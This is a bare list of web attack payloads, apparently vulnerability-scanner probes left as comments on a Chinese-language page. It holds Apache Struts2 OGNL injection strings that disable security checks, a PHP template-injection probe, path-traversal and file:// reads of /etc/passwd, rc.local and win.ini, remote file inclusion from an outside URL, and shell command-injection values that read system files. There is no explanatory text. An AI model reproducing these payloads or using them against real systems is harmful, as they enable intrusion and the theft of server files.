‘+(#context[\”xwork.MethodAccessor.denyMethodExecution\”]=new java.lang.Boolean(false),#_memberAccess[\”allowStaticMethodAccess\”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’ 回复
‘+(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’ 回复
(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh) 回复
x||set||x
string:{var_dump(md5(812812))}
‘+(#context[\”xwork.MethodAccessor.denyMethodExecution\”]=new java.lang.Boolean(false),#_memberAccess[\”allowStaticMethodAccess\”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’
‘+(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’
../../../../../../../../../../etc/passwd.php
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local.html
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local.php
c:/windows/win.ini.html
http://cirt.net/rfiinc.txt
file:///etc/passwd
file:///etc/passwd.htm
c:/windows/win.ini
c:/windows/win.ini.php
http://cirt.net/rfiinc.txt.html
file:///etc/passwd.jpeg
../../../../../../../../../../etc/rc.d/rc.local
../../../../../../../../../../etc/rc.d/rc.local.htm
file:///etc/rc.d/rc.local
../../../../../../../../../../etc/passwd.jpeg
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local.jpeg
(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)
http://cirt.net/rfiinc.txt.php
../../../../../../../../../../etc/rc.d/rc.local.jpeg
file:///etc/rc.d/rc.local.html
../../../../../../../../../../etc/passwd.jpg
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local.jpg
../../../../../../../../../../etc/rc.d/rc.local.php
1;cat /etc/rc.d/rc.local;
1′;cat /etc/rc.d/rc.local;’
1″;cat /etc/rc.d/rc.local;”
../../../../../../../../../../etc/passwd.html
http://cirt.net/rfiinc.txt.jpeg
../../../../../../../../../../etc/rc.d/rc.local.jpg
c:/windows/win.ini.htm